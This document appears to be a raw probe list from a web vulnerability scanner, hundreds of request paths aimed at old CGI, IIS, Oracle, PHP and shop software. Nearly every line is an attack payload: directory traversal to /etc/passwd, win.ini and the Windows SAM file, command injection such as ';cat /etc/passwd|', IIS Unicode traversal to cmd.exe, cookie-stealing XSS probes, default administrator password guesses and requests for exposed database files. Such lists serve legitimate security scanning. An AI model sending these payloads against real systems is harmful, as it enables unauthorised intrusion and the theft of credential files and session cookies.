+cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA +GW5/GWWEB.EXE?HELP=bad-request +GWWEB.EXE?HELP=bad-request +cgi-bin/GW5/GWWEB.EXE?HELP=bad-request +cgi-bin/GWWEB.EXE?HELP=bad-request +examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script> +XSQLConfig.xml +sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> +docs/<script>alert('Vulnerable');</script> +docs/NED?action=retrieve&location=. +aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> +lcgi/ndsobj.nlm +surf/scwebusers +_vti_bin/fpcount.exe +_private/form_results.htm +_private/form_results.html +_private/form_results.txt +scripts/tools/getdrvrs.exe +cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd +cgi-bin/vote.cgi +cgi-bin/quizme.cgi +/ +shop/normal_html.cgi?file=../../../../../../etc/issue%00 +shop/normal_html.cgi?file=;cat%20/etc/passwd| +shop/normal_html.cgi?file=|cat%20/etc/passwd| +shop/member_html.cgi?file=;cat%20/etc/passwd| +shop/member_html.cgi?file=|cat%20/etc/passwd| +cgi-bin/sendform.cgi +boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/ +proxy/ssllogin?user=administrator&password=administrator +proxy/ssllogin?user=administrator&password=operator +proxy/ssllogin?user=administrator&password=user +cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd +cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot= +cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd +cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot= +cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd +cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= +cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd +cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= +project/index.php?m=projects&user_cookie=1 +webcalendar/colors.php?color=</script><script>alert(document.cookie)</script> +webcalendar/week.php?user=\"><script>alert(document.cookie)</script> +active.log +?pattern=/etc/*&sort=name +images/?pattern=/etc/*&sort=name +debug/dbg?host==<script>alert('Vulnerable');</script> +debug/echo?name=<script>alert('Vulnerable');</script> +debug/errorInfo?title===<script>alert('Vulnerable');</script> +debug/showproc?proc===<script>alert('Vulnerable');</script> +site/eg/source.asp +PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00 +~nobody/etc/passwd +admin/db.php +admin/db.php?dump_sql=1 +dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 +cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 +%00/ +iissamples/exair/search/advsearch.asp +isqlplus +data/member_log.txt +data/userlog/log.txt +userlog.php +internal.sws?../../../../../../../../winnt/win.ini +internal.sws?../../../../../../../../winnt/win.ini +internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini +internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini +ASP/cart/database/metacart.mdb +database/metacart.mdb +mcartfree/database/metacart.mdb +metacart/database/metacart.mdb +shop/database/metacart.mdb +shoponline/fpdb/shop.mdb +shopping/database/metacart.mdb +search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script> +admin/phpinfo.php +start.php?config=alper.inc.php +login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang +viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1 +cgi-bin/gettransbitmap +cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd| +JUNK(5).xml +JUNK(5)/ +cgi-bin/main_menu.pl +ban.bak +ban.dat +ban.log +banmat.pwd +admin/adminproc.asp +admin/datasource.asp +utils/sprc.asp +reports/temp/ +cgi-bin/rtm.log +cgi-bin/VsSetCookie.exe? +addressbook.php?\"><script>alert(Vulnerable)</script><!-- +options.php?optpage=<script>alert('Vulnerable!')</script> +search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search +help.php?chapter=<script>alert('Vulnerable')</script> +src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0 +cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd +cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd +cgi-bin/Webnews.exe +cgi-bin/webnews.pl +.../.../.../ +cgi-bin/texis.exe/junk +cgi-bin/texis/junk +texis.exe/?-dump +texis.exe/?-version +cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ +acart2_0/deliver.asp?msg=<script>alert(\"test\")</script> +acart2_0/error.asp?msg=<script>alert(\"test\")</script> +acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script> +acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script> +cgi-bin/sensepost.exe?/c+dir +certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir +cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir +iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir +msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir +pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir +rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir +scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir +scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir +scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\" +_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir +acart2_0/acart2_0.mdb +acart2_0/admin/category.asp +Sites/Knowledge/Membership/Inspired/ViewCode.asp +Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp +Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp +Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp +Sites/Samples/Knowledge/Push/ViewCode.asp +Sites/Samples/Knowledge/Search/ViewCode.asp +SiteServer/Publishing/ViewCode.asp +siteserver/publishing/viewcode.asp?source=/default.asp +shoutbox.php?conf=../../../../../../../etc/passwd +securelogin/1,2345,A,00.html +.%252e/.%252e/.%252e/winnt/boot.ini +add.php +class/mysql.class +inc/sendmail.inc +admin/system.php3?cmd=cat%20/etc/passwd +admin/system.php3?cmd=dir%20c:\ +admin/exec.php3?cmd=cat%20/etc/passwd +admin/exec.php3?cmd=dir%20c:\ +foo.php3 +config.inc +cgi-bin/environ.pl +cgi-bin/testcgi.exe +sysuser/docmgr/ieedit.stm?url=../ +sysuser/docmgr/iecreate.stm?template=../ +wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script> +sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script> +sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script> +sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script> +cgi-bin/testcgi.exe?<script>alert(document.cookie)</script> +cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script> +syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script> +syshelp/stmex.stm?foo=<script>alert(document.cookie)</script> +syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script> +syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script> +syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script> +netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> +netutils/findata.stm?host=<script>alert(document.cookie)</script> +netutils/findata.stm?user=<script>alert(document.cookie)</script> +sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script> +isapi/tstisapi.dll +cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf +lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf +cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd +cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd +catinfo +soap/servlet/soaprouter +opendir.php?/etc/passwd +opendir.php?requesturl=/etc/passwd +webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD +cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD +webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> +webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week +cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> +cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week +webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> +webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> +cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> +cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script> +webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> +cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> +webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> +cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> +JUNK(223)<font%20size=50>DEFACED<!--//-- +MWS/HandleSearch.html?searchTarget=test&B1=Submit +cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd +cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd +cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd +cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd +certsrv/..%255cwinnt/system32/cmd.exe?/c+dir +cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir +msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir +scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir +scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver +_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +server-info +cgi-bin/namazu.cgi +oekaki/ +.nsconfig +cgi-bin/.nsconfig +?D=A +?N=D +?S=A +?M=A +cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1 +cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1 +dc/auth_data/auth_user_file.txt +dc/orders/orders.txt +dcshop/auth_data/auth_user_file.txt +dcshop/orders/orders.txt +cgi-bin/shop.pl/page=;cat%20shop.pl| +cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 +.FBCIndex +cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| +cgi-bin/eshop.pl/seite=;cat%20eshop.pl| +JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//-- +cgi-bin/ion-p.exe?page=c:\winnt\repair\sam +cgi-bin/ion-p?page=../../../../../etc/passwd +..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini +..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini +cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html +applist.asp +launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica +_layouts/alllibs.htm +_layouts/settings.htm +_layouts/userinfo.htm +cgi-bin/index.pl +.DS_Store +cgi-bin/rwcgi60 +cgi-bin/rwcgi60/showenv +cgi-bin/index.pl +cgi-bin/index.pl +cgi-bin/classifieds/classifieds.cgi +cgi-bin/calendar/index.cgi +stronghold-info +stronghold-status +blah-whatever.jsp +gallery/index.php?include=../../../../../../../../../etc/passwd +modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd +cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe +cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe +cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe +phprocketaddin/?page=../../../../../../../../../../etc/passwd +cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> +iissamples/exair/howitworks/Code.asp +iissamples/exair/howitworks/Codebrw1.asp +msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini +pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script> +pls/help/<script>alert('Vulnerable')</script> +demo/ojspext/events/globals.jsa +globals.jsa +pls/sample/admin_/help/..%255cplsql.conf +servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml +..%252f..%252f..%252f..%252f..%252f../windows/repair/sam +..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam +..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ +..%255c..%255c..%255c..%255c..%255c../windows/repair/sam +..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam +..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ +..%2F..%2F..%2F..%2F..%2F../windows/repair/sam +..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam +..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ +ans.pl?p=../../../../../usr/bin/id|&blah +ans/ans.pl?p=../../../../../usr/bin/id|&blah +cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd` +?\"><script>alert('Vulnerable');</script> +JUNK(10)abcd.html +iissamples/exair/howitworks/codebrws.asp +servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa +servlet/com.newatlanta.servletexec.JSP10Servlet/ +iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp +iissamples/sdk/asp/docs/codebrws.asp +iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp +error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini +error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini +iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +pass_done.php +admin/admin.php?adminpy=1 +iishelp/iis/htm/tutorial/redirect.asp +servlet/SnoopServlet +Citrix/PNAgent/ +Citrix/ICAWEB/ +IBMWebAS/ +IBMWebAS/docs/ +IBMWebAS/apidocs/ +IBMWebAS/configDocs/ +IBMWebAS/mbeanDocs/ +iishelp/iis/misc/default.asp +Citrix/MetaFrameXP/default/login.asp +manager/html-manager-howto.html +manager/manager-howto.html +includes/adovbs.inc +adovbs.inc +fcgi-bin/echo +fcgi-bin/echo2 +pls/ldc/admin_/ +demo/basic/simple/viewsrc/welcomeuser.jsp.txt +README +demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt +soapdocs/webapps/soap/ +soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml +shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script> +phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> +phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script> +j2ee/ +cgi-bin/printenv.tmp +perl/printenv +perl-status +WebCacheDemo.html +webcache/ +webcache/webcache.xml +bmp/ +bmp/global-web-application.xml +bmp/JSPClient.java +bmp/mime.types +bmp/README.txt +bmp/sqljdemo.jsp +bmp/setconn.jsp +ptg_upgrade_pkg.log +OA_HTML/oam/weboam.log +webapp/admin/_pages/_bc4jadmin/ +_pages/_webapp/_admin/_showpooldetails.java +_pages/_webapp/_admin/_showjavartdetails.java +_pages/_demo/ +_pages/_webapp/_jsp/ +_pages/_demo/_sql/ +/OA_HTML/_pages/ +OA_HTML/webtools/doc/index.html +reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF +apex/ +OA_JAVA/ +OA_HTML/ +aplogon.html +appdet.html +servlets/weboam/oam/oamLogin +OA_HTML/PTB/mwa_readme.htm +reports/rwservlet +reports/rwservlet/showenv +reports/rwservlet/showmap +reports/rwservlet/showjobs +reports/rwservlet/getjobid7?server=myrep +reports/rwservlet/getjobid4?server=myrep +reports/rwservlet/showmap?server=myserver +pls/portal/owa_util.cellsprint?p_theQuery=select +pls/portal/owa_util.listprint?p_theQuery=select +pls/portal/owa_util.show_query_columns?ctable=sys.dba_users +pls/portal/owa_util.showsource?cname=owa_util +pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users +pls/portal/owa_util.signature +pls/portal/HTP.PRINT +pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT +pls/portal/PORTAL_DEMO.ORG_CHART.SHOW +pls/portal/PORTAL.wwv_form.genpopuplist +pls/portal/PORTAL.wwv_ui_lovf.show +pls/portal/PORTAL.wwa_app_module.link +pls/portal/PORTAL.wwv_dynxml_generator.show +pls/portal/PORTAL.home +pls/portal/PORTAL.wwv_setting.render_css +pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO +pls/portal/SELECT +pls/portal/null +OA_MEDIA/ +OA_HTML/META-INF/ +OA_HTML/jsp/por/services/login.jsp +OA_HTML/PTB/ICXINDEXBASECASE.htm +OA_HTML/PTB/ECXOTAPing.htm +OA_HTML/PTB/xml_sample1.htm +OA_HTML/jsp/wf/WFReassign.jsp +OA_JAVA/Oracle/ +OA_JAVA/servlet.zip +OA_JAVA/oracle/forms/registry/Registry.dat +OA_HTML/oam/ +OA_HTML/jsp/ +OA_HTML/jsp/fnd/fndversion.jsp +OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc +OA_HTML/jsp/fnd/fndhelputil.jsp +install/install.php +_vti_bin/shtml.dll/_vti_rpc +cehttp/trace +cehttp/property/ +webdav/index.html +hp-ux/ +hp_docs/ +hp_docs/cgi-bin/index.cgi +hp_docs/xmltools/ +cgi-bin/showuser.cgi +cgi-bin/man2html +status?full=true +rpc.php?q="><script>alert(document.cookie)</script> +db.php?q='&t=' +rpc.php?q='&t=' |